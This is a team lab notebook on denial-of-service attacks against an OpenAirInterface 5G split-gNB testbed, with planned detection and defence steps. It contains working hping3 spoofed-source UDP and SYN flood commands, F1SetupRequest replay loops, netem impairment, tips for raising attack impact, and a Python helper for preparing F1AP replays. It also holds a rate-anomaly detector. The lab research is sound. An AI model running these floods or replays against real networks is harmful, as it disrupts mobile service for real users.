# whereas F1AP is carried with PPID 62 (TS 38.472), and every loop iteration sets up and
# tears down a fresh SCTP association.
while true; do
  socat -u FILE:./packet.bin SCTP4:192.168.72.2:38472
done

# Same with frames 58 and 77
editcap -r cu-cp-all.pcap extract2.pcap 58 77
tshark -r extract2.pcap -x | grep -oE '([0-9a-f]{2} ){16}' | tr -d ' ' | xxd -r -p > packet2.bin
while true; do
  socat -u FILE:./packet2.bin SCTP4:192.168.72.2:38472
done
# -> After the last UE reconnected, ping no longer works
# CPU up 8%, MEM growing 0.04 MiB per second
```
:::

:::spoiler UE context manage - Miracle
{%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rkDTM_delg %}

| category | detail |
|:--|:--|
| System | CN + split gNB (CU-CP + DU) + 3 UE |
| Hardware | . |
| Tools | Docker, tcpdump, Wireshark, tcpreplay |
| Condition | Captured F1SetupRequest via tcpdump |
| Result | No F1SetupResponse; DU becomes unresponsive |
| Found | Many SCTP retransmits; frequent heartbeats |
| Drawback | Loop did not fully crash DU/CU |
| Comment | Requires pre-capture; impact is limited |

| requirement | detail |
|:--|:--|
| Network access | Root on F1-C bridge interface (rfsim5g-f1c) |
| Tool privilege | Ability to run tcpdump and tcpreplay as sudo |
| Known info | CU & DU IPs, SCTP port (38472), F1SetupRequest pcap |
| Replay capability | tcpreplay must preserve SCTP tags and TSNs |

| aspect | notes |
|:--|:--|
| Error | Attack loop didn't crash DU/CU fully |
| Assumption | CU will retry on all duplicate SetupRequests |
| Assumption | No replay protection on F1SetupRequest |
| Optimization | Increase pps or use sendfast for higher rate |
| Optimization | Launch attack before F1SetupResponse arrives |

> try...
> - Capture and replay before the first F1SetupResponse.
> - Use higher pps (e.g. `--pps` in tcpreplay) or sendfast.
> - Spoof SCTP TSN and tag for better acceptance.
> - Run multiple parallel replay loops.
> - Bypass anti-replay by timing floods during the setup window.
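Both replay attempts above hand the CU-CP bytes from a dead association: the socat loop sends the whole captured frame as payload, and the tcpreplay loop re-emits frames whose SCTP verification tag belongs to the CU-DU association that existed at capture time. The following added example (not code from this write-up, from OAI or from the project repository; pure Python, no scapy) shows the three checks a practitioner wants before replaying: a `tshark -x` parser that keeps the short final row, extraction of the F1AP PDU from the SCTP DATA chunk by PPID 62 (TS 38.472), and the verification-tag rule of RFC 4960 section 8.5 that makes a replayed frame silently disappear once the DU has re-associated. Assumptions: Ethernet II framing (capture on the `rfsim5g-f1c` bridge, not `-i any`, which prepends a longer Linux-cooked header), IPv4, port 38472, PPID 62; the sample frame, both verification tags and the PDU bytes are constructed, and the PDU is a placeholder rather than a real F1 Setup Request.

```python
"""Extract the F1AP PDU from a captured F1-C packet and show why a replayed frame
is dropped. Added example, not code from the page, OAI or the project repo.
Assumptions: Ethernet II + IPv4, SCTP port 38472, F1AP in DATA chunks with PPID 62
(TS 38.472). The frame, tags and PDU bytes below are constructed placeholders."""
import re
import struct
from typing import List, Optional

F1AP_PPID = 62      # TS 38.472: SCTP payload protocol identifier assigned to F1AP
F1C_PORT = 38472    # F1-C SCTP port of the CU-CP on this page
SCTP_DATA = 0       # chunk type DATA (RFC 4960 section 3.3.1)
IPPROTO_SCTP = 132
ETH_LEN = 14


def hexdump_to_bytes(dump: str) -> bytes:
    """Parse `tshark -r x.pcap -Y ... -x` output. Unlike a grep for 16-byte rows this
    keeps the shorter final row; it stops at the first blank line so a trailing
    reassembly section is not glued onto the frame."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            break
        m = re.match(r'^[0-9a-fA-F]{4,}\s+((?:[0-9a-fA-F]{2} ?){1,16})', line)
        if m:
            out += bytes.fromhex(m.group(1).replace(' ', ''))
    return bytes(out)


def parse_sctp(segment: bytes) -> dict:
    """Common header plus chunk list; DATA chunks carry tsn/stream/ppid/payload."""
    sport, dport, vtag, _crc32c = struct.unpack('!HHII', segment[:12])
    chunks, off = [], 12
    while off + 4 <= len(segment):
        ctype, cflags, clen = struct.unpack('!BBH', segment[off:off + 4])
        if clen < 4:
            raise ValueError('malformed chunk length')
        chunk = {'type': ctype, 'flags': cflags}
        if ctype == SCTP_DATA:
            body = segment[off + 4:off + clen]
            tsn, sid, ssn, ppid = struct.unpack('!IHHI', body[:12])
            chunk.update(tsn=tsn, stream=sid, ssn=ssn, ppid=ppid, payload=body[12:])
        chunks.append(chunk)
        off += (clen + 3) & ~3              # chunks are padded to 4 bytes
    return {'sport': sport, 'dport': dport, 'vtag': vtag, 'chunks': chunks}


def sctp_from_frame(frame: bytes) -> Optional[bytes]:
    """The SCTP packet inside an Ethernet/IPv4 frame, or None if there is none."""
    if len(frame) < ETH_LEN + 20 or frame[12:14] != b'\x08\x00':
        return None
    ip = frame[ETH_LEN:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack('!H', ip[2:4])[0]
    return ip[ihl:total_len] if ip[9] == IPPROTO_SCTP else None


def f1ap_pdus(frame: bytes) -> List[bytes]:
    """What a replay should send: the F1AP PDUs, not the frame around them."""
    seg = sctp_from_frame(frame)
    if seg is None:
        return []
    pkt = parse_sctp(seg)
    if F1C_PORT not in (pkt['sport'], pkt['dport']):
        return []
    return [c['payload'] for c in pkt['chunks']
            if c['type'] == SCTP_DATA and c['ppid'] == F1AP_PPID]


def replay_accepted(frame: bytes, live_vtag: int) -> bool:
    """RFC 4960 section 8.5: a packet whose verification tag is not the tag of the
    receiver's current association is silently discarded. A frame captured from an
    earlier CU-DU association therefore never reaches F1AP after a re-association."""
    seg = sctp_from_frame(frame)
    return seg is not None and parse_sctp(seg)['vtag'] == live_vtag


def build_frame(payload: bytes, *, vtag: int, tsn: int, ppid: int = F1AP_PPID,
                src_port: int = 50000, dst_port: int = F1C_PORT) -> bytes:
    """Constructed DU -> CU-CP frame for the demo; the SCTP CRC32c is left zero."""
    data = struct.pack('!IHHI', tsn, 0, 0, ppid) + payload               # stream 0
    chunk = struct.pack('!BBH', SCTP_DATA, 0x03, 4 + len(data)) + data   # B|E flags
    chunk += b'\x00' * (-len(chunk) % 4)
    sctp = struct.pack('!HHII', src_port, dst_port, vtag, 0) + chunk
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(sctp), 0, 0x4000, 64,
                     IPPROTO_SCTP, 0, bytes([192, 168, 72, 3]), bytes([192, 168, 72, 2]))
    return b'\x02' * 12 + b'\x08\x00' + ip + sctp


def tshark_style_dump(data: bytes) -> str:
    """Render bytes the way `tshark -x` prints them, to feed hexdump_to_bytes."""
    rows = []
    for off in range(0, len(data), 16):
        row = data[off:off + 16]
        hexpart = ' '.join(f'{b:02x}' for b in row).ljust(47)
        text = ''.join(chr(b) if 32 <= b < 127 else '.' for b in row)
        rows.append(f'{off:04x}  {hexpart}   {text}')
    return '\n'.join(rows) + '\n'


# Constructed sample: placeholder PDU bytes (odd length, so chunk padding is exercised)
SAMPLE_PDU = bytes.fromhex('00010040200000040000000000')
CAPTURED_VTAG, LIVE_VTAG = 0x1A2B3C4D, 0x5E6F7081
SAMPLE_FRAME = build_frame(SAMPLE_PDU, vtag=CAPTURED_VTAG, tsn=1000)

if __name__ == '__main__':
    frame = hexdump_to_bytes(tshark_style_dump(SAMPLE_FRAME))
    print('F1AP PDU to send with PPID 62:', f1ap_pdus(frame)[0].hex())
    print('replayed frame accepted by the live association:', replay_accepted(frame, LIVE_VTAG))
```

To reuse a captured F1AP message against a live CU-CP you therefore need a real association of your own (INIT / INIT-ACK / COOKIE-ECHO handshake) and then send the extracted PDU on it with PPID 62; replaying frames only exercises the CU-CP's discard path, which matches the "no reaction" observed above.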
```bash=
# Run CN
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker-compose up -d mysql oai-amf oai-smf oai-upf

# Run CU-CP and DU
docker-compose up -d oai-cucp oai-du

# Run UEs
docker-compose up -d oai-nr-ue oai-nr-ue2 oai-nr-ue3

# Capture baseline F1-C traffic (one capture per terminal)
sudo tcpdump -i rfsim5g-f1c port 38472 -w baseline_cu.pcap
sudo tcpdump -i rfsim5g-f1c port 38472 -w baseline_du.pcap

# Rebuild F1SetupRequest pcap via Wireshark (export "F1SetupRequest" only)

# Send one replay packet
sudo tcpreplay --intf1=rfsim5g-f1c f1setup_replay.pcap

# Flood forever with 0.1 s delay
while true; do
  sudo tcpreplay --intf1=rfsim5g-f1c f1setup_replay.pcap
  sleep 0.1
done

# High-speed variants
sudo tcpreplay --intf1=rfsim5g-f1c --loop=0 --multiplier=10 f1setup_replay.pcap
sudo tcpreplay --intf1=rfsim5g-f1c --loop=0 --pps=10000 f1setup_replay.pcap
```
:::

#### Hand over / Tracking Area Update
-

#### PDU Session / Bearer Flooding
-

### F1-U

:::spoiler UDP flood - Joon
| category | detail |
|:--|:--|
| System | CN + F1/E1 split gNB (1 CU-CP / 3 CU-UP / 3 DU) + 4 UE |
| Hardware | 8 GB RAM |
| Tools | N/A |
| Condition | Known IP |
| Result | MEM grows 0.04 MiB/s |
| Found | |
| Drawback | |
| Comment | |

![{D9B7D9EF-1EEA-4C61-8632-4881D83169CF}](https://hackmd.io/_uploads/HJK5Ha8exx.png)

```bash=
# Capture everything to/from the DU's F1-U address
sudo tcpdump -i any host 192.168.73.3 -w f1u-1-all.pcap

cd
docker rm attacker
# The attacker joins the F1-C bridge here, but 192.168.73.3 lives on rfsim5g-oai-f1u-1-net and
# Docker isolates user-defined bridges from each other, so the container must also be attached
# to that network (docker network connect) before the flood can reach the DU's F1-U port.
docker run -dit --name attacker --network rfsim5g-oai-f1c-net ubuntu:24.04 bash
docker exec -it attacker bash
apt update && apt install -y hping3 python3-scapy
docker cp ~/flood_f1u.py attacker:/root
python3 /root/flood_f1u.py
```
:::

:::spoiler UDP flood - Miracle
{%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/HkoAtBkxgx %}

| category | detail |
|:--|:--|
| System | 3 VMs: CU (VM1), DU+UE (VM2), Attacker (VM3) |
| Hardware | NAT & host-only adapters on each VM |
| Tools | hping3, tcpdump, Wireshark, OAI softmodem |
| Condition | Attacker in same 192.168.243.0/24 subnet; port 2152 known |
| Result | Initial flood slowed DU; multi-port flood broke SCTP |
| Found | ↑DU CPU & interrupt load; SCTP "Broken pipe"; UE retries |
| Drawback | Single-VM flood = DoS, not true DDoS; hping3 lacks SCTP |
| Comment | Rapid, multi-port UDP flood can indirectly collapse F1-C |

| requirement | detail |
|:--|:--|
| Network | Same subnet (192.168.243.0/24) |
| Privilege | Root on attacker VM |
| Info | DU IP 192.168.243.129:2152 |
| Tool | hping3 with `--rand-source` |
| Timing | During active F1-U session |

| aspect | notes |
|:--|:--|
| Error | Single-VM flood is only DoS, not distributed |
| Error | hping3 can't target SCTP directly on F1-C |
| Assumption | No UDP rate limiting on DU's port 2152 |
| Assumption | Network allows IP spoofing without ingress filters |
| Optimization | Use `sendfast` or multi-threaded scripts for higher pps |
| Optimization | Deploy ≥2 attacker VMs for true DDoS |

> try...
> - Deploy multiple attacker VMs to simulate a distributed flood.
> - Use a tool with SCTP support for direct F1-C attacks.
> - Increase packet rate via sendfast or parallel processes.
> - Randomize both source and destination ports per packet.
> - Time attacks to coincide with F1-C setup windows.
```bash=
# Start CU, DU+UE
cd ~/openairinterface5g/cmake_targets/ran_build/build
sudo RFSIMULATOR=server ./nr-softmodem --rfsim --sa -O ../../../ci-scripts/conf_files/gNB_SA_CU.conf
sudo RFSIMULATOR=server ./nr-softmodem --rfsim --sa -O ../../../ci-scripts/conf_files/gNB_SA_DU.conf
sudo RFSIMULATOR=127.0.0.1 ./nr-uesoftmodem -r 106 --numerology 1 \
  --band 78 -C 3619200000 --rfsim \
  -O ../../../ci-scripts/conf_files/nrue.band78.106prb.l2sim.conf

# On attacker VM: install tools
sudo apt update
sudo apt install hping3 tcpdump -y

# Capture baseline
sudo tcpdump -i ens33 port 2152 -w before.pcap

# Single-port UDP flood (moderate rate: one packet every 500 us, spoofed sources)
sudo hping3 --udp -p 2152 -i u500 --rand-source 192.168.243.129

# Multi-port rapid flood (high impact: one packet every 10 us, destination port incremented from 2200)
sudo hping3 --udp -i u10 --rand-source --baseport 2100 -p ++2200 192.168.243.129

# Stop capture after ~1 min: Ctrl+C
```
:::

### F1AP

#### Information sniffing
-

#### Fuzzing
-

### None of the above

:::spoiler Delay Simulation - Miracle
{%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/SkgmMBC0ye %}

| category | detail |
|:--|:--|
| System | CU, DU, UE on localhost via RFSIM (127.0.0.4 ↔ 127.0.0.3) |
| Hardware | . |
| Tools | `tc netem`, `tcpdump`, Wireshark |
| Condition | Baseline SCTP capture on port 38472 |
| Result | DU out of sync, `ulsch_errors` ↑, UE fails RRC connect |
| Found | SCTP packets ↓, bytes ↓, throughput ↓ after delay/loss |
| Drawback | Simulated delay only; no real packet manipulation |
| Comment | Delay/loss on F1 slows control signalling |

| requirement | detail |
|:--|:--|
| Privilege | `root` to run `tc qdisc` on loopback |
| Interface | `lo` with F1-C SCTP at 127.0.0.4/127.0.0.3:38472 |
| Tools | `tc`, `tcpdump`, `ss`, `ping`, Wireshark |
| Baseline | Pre-attack packet captures & performance logs |

| aspect | notes |
|:--|:--|
| Error | Only injects delay/loss, no payload tampering |
| Assumption | Loopback netem reflects real network impairments |
| Assumption | SCTP retransmits aren't rate limited |
| Optimization | Add jitter and packet reordering to worsen impact |
| Optimization | Script `tc qdisc` commands for repeatable automation |

> try...
> - Use a real network path instead of loopback.
> - Combine delay, loss, and jitter for varied impairment.
> - Automate CPU/log collection during the test.
> - Sweep multiple delay/loss percentages to characterize the threshold.
> - Compare with other qdisc types (e.g., TBF, netfilter rules).
```bash= # heck SCTP port for F1-C sudo ss -H -n -a | grep sctp # Capture baseline F1 traffic sudo tcpdump -i lo port 38472 -w baseline_f1_traffic.pcap # Inject 200 ms delay and 10 % packet loss sudo tc qdisc add dev lo root netem delay 200ms loss 10% # Observe DU/UE logs and Wireshark captures # Test connectivity from DU to CU ping 127.0.0.3 -c 15 ping 127.0.0.4 -c 13 # Reset network emulation sudo tc qdisc del dev lo root ``` ::: :::spoiler Delay Simulation 2 - Miracle {%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/HJXb-1pRkg %} | category | detail | |:--------- |:---------------------------------------------------- | | System | LIVE555 server + OAI CU/DU + VLC client | | Hardware | . | | Tools | LIVE555, VLC, ffmpeg, hping3, tc-netem, tcpdump, top | | Condition | RTSP port 8554 open and streaming baseline | | Result | Stream freeze, dropped frames, higher CPU load | | Found | SYN flood too weak; netem delay/loss effective | | Drawback | Only simulates RTSP, not real F1 traffic | | Comment | Requires root and pre-configured video stream | | requirement | detail | |:---------------- |:------------------------------------------- | | Network access | Root on host loopback or Docker interface | | Tool privilege | `sudo` for `hping3` and `tc qdisc` commands | | Known info | RTSP port 8554, server & client IPs | | Pre-installed SW | LIVE555, ffmpeg, VLC | | Timing control | Attack during active streaming session | | aspect | note | |:------------ |:-------------------------------------------------------- | | Error | SYN flood alone was too weak | | Assumption | RTSP flood translates to CU CPU stress | | Optimization | Use high-rate send tools (e.g. `sendfast`) | | Optimization | Apply netem on real network interface, not just loopback | > try... 
Use sendfast or tcpreplay for higher packet rates Combine TCP SYN flood with UDP flood on port 8554 Automate netem scripts triggered by streaming metrics Target real GTP-U tunnels instead of RTSP for genuine F1-U testing ```bash= # Build & run LIVE555 server cd ~/live555 && ./genMakefiles linux && make -j4 cd live && ./mediaServer/live555MediaServer # Prepare video ffmpeg -i vid.mp4 -vcodec libx264 -f h264 vid2.264 # Play stream vlc rtsp://127.0.0.1:8554/vid2.264 # SYN flood attack sudo hping3 -S -p 8554 --flood 127.0.0.1 # Inject delay & loss sudo tc qdisc add dev lo root netem delay 300ms loss 20% # Reset network sudo tc qdisc del dev lo root ``` ::: ## Upgrade attack - ## Verify attack - # Part II: Detection ## Develop Procedure ### 1. Get index | type | tools | |:------------------- |:------------ | | packet | tcpdump | | network flow matric | grep, docker | | hardware matric | | | KPIs? | RICs | ### 2. Graph layout | type | tools | |:-------- |:----------- | | chart | Speedometer | | topology | EtherApe | | alert | | ### 3. Detect attack - by which algorithm? - rate anormaly - attack pattern ### 4. Automate by scripting ```bash= code ``` # Part III: Defence ## Steps - Try various defence - [ ] Filtering - [ ] Rate Limiting / Throttling(dynamic) - [ ] Encryption/Authentication/Integrity - [ ] Dynamic allocation of DU by CU(disconnect/reboot) - [ ] Self protection(RAN changes ip and reboot) - Upgrade Defence - [ ] Automate defence # Wrapping stage distribution table # > [name=Joon] > > experiment environment: > > software: > Ubuntu 24.04.2 LTS (amd64) > VMware Workstation 17 Player (Non-commercial) > Windows 11 > > > hardware: > intel CPU - 10 cores > RAM - 32GB > NVIDIA GPU > > [chatGPT](https://chatgpt.com) > [Cursor](https://cursor.com)
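For Part II steps 3 and 4 (detect by rate anomaly / attack pattern, then automate by script), the following is an added example written for this roadmap; it is not code from the project or from OAI. It reads `tcpdump -nn -tt` style text lines for the two F1 ports the page uses (SCTP 38472 for F1-C, UDP 2152 for F1-U GTP-U), learns a packets-per-second baseline from the pre-attack seconds, and raises an alert when a second exceeds mean + k·stdev or when the number of distinct source addresses jumps (the pattern `--rand-source` floods leave, whereas normal F1 traffic has only the CU and DU as peers). The capture lines, the thresholds `k=3.0` and `min_srcs=5`, and the function names are all assumptions for the example.

```python
"""Rate-anomaly detector for F1 traffic fed with tcpdump-style text lines.

Added example for the detection step of this roadmap (not project code).
Input format assumed: `tcpdump -nn -tt -i <if> port 38472 or port 2152`, i.e.
"<epoch> IP <src>.<sport> > <dst>.<dport>: <proto> ..."
"""
import re
import statistics
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<proto>\w+)"
)

# F1 ports named on the page: F1-C over SCTP, F1-U (GTP-U) over UDP.
F1_PORTS = {38472: "F1-C (SCTP)", 2152: "F1-U (GTP-U)"}


def parse_line(line):
    """Parse one tcpdump text line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "src": m.group("src"),
            "dst": m.group("dst"), "dport": int(m.group("dport")),
            "proto": m.group("proto")}


def bucket_by_second(lines):
    """Aggregate F1-port packets per whole second: count, distinct sources, ports hit."""
    buckets = defaultdict(lambda: {"pkts": 0, "srcs": set(), "dports": set()})
    for line in lines:
        pkt = parse_line(line)
        if pkt is None or pkt["dport"] not in F1_PORTS:
            continue
        b = buckets[int(pkt["ts"])]
        b["pkts"] += 1
        b["srcs"].add(pkt["src"])
        b["dports"].add(pkt["dport"])
    return dict(buckets)


def detect(lines, baseline_until, k=3.0, min_srcs=5):
    """Learn a pps baseline from seconds < baseline_until, then flag later seconds.

    Returns (threshold_pps, alerts). k and min_srcs are assumed tuning values.
    """
    buckets = bucket_by_second(lines)
    seconds = sorted(buckets)
    baseline = [buckets[s]["pkts"] for s in seconds if s < baseline_until]
    if not baseline:
        raise ValueError("no baseline seconds before baseline_until")
    mean, stdev = statistics.mean(baseline), statistics.pstdev(baseline)
    # Floor the deviation at 1 pps so a perfectly flat baseline still alerts sensibly.
    threshold = mean + k * max(stdev, 1.0)
    alerts = []
    for s in seconds:
        if s < baseline_until:
            continue
        b = buckets[s]
        reasons = []
        if b["pkts"] > threshold:
            reasons.append(f"rate {b['pkts']} pps > threshold {threshold:.1f}")
        if len(b["srcs"]) >= min_srcs:
            reasons.append(f"{len(b['srcs'])} distinct sources (spoofed-source pattern)")
        if reasons:
            alerts.append({"second": s, "pkts": b["pkts"], "sources": len(b["srcs"]),
                           "ports": [F1_PORTS[p] for p in sorted(b["dports"])],
                           "reasons": reasons})
    return threshold, alerts


def build_sample_capture():
    """Constructed sample lines (not a real capture): 5 s of normal F1-C signaling
    between DU 127.0.0.3 and CU 127.0.0.4, then 2 s of a spoofed UDP flood at the
    GTP-U port of the page's test target address."""
    lines = []
    for sec in range(1000, 1005):
        for i in range(4):
            lines.append(f"{sec}.{i}00000 IP 127.0.0.3.38472 > 127.0.0.4.38472: sctp (1) [DATA]")
        lines.append(f"{sec}.500000 IP 127.0.0.4.38472 > 127.0.0.3.38472: sctp (1) [SACK]")
    for sec in (1005, 1006):
        for i in range(40):
            src = f"10.{i}.{(i * 7) % 256}.{(i * 13) % 256}"  # constructed spoofed sources
            lines.append(f"{sec}.{i:02d}0000 IP {src}.{40000 + i} > 192.168.243.129.2152: UDP, length 0")
    lines.append("1005.900000 IP 127.0.0.3.38472 > 127.0.0.4.38472: sctp (1) [HEARTBEAT]")
    return lines


if __name__ == "__main__":
    threshold, alerts = detect(build_sample_capture(), baseline_until=1005)
    print(f"baseline threshold: {threshold:.1f} pps")
    for a in alerts:
        print(f"t={a['second']} pkts={a['pkts']} srcs={a['sources']} ports={a['ports']}")
        for r in a["reasons"]:
            print("   -", r)
```

To run it against a live capture instead of the constructed lines, pipe `sudo tcpdump -nn -tt -i lo port 38472 or port 2152 -l` into a loop that feeds `detect()` a sliding window of lines; the per-second buckets are what the Speedometer chart in step 2 would plot.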
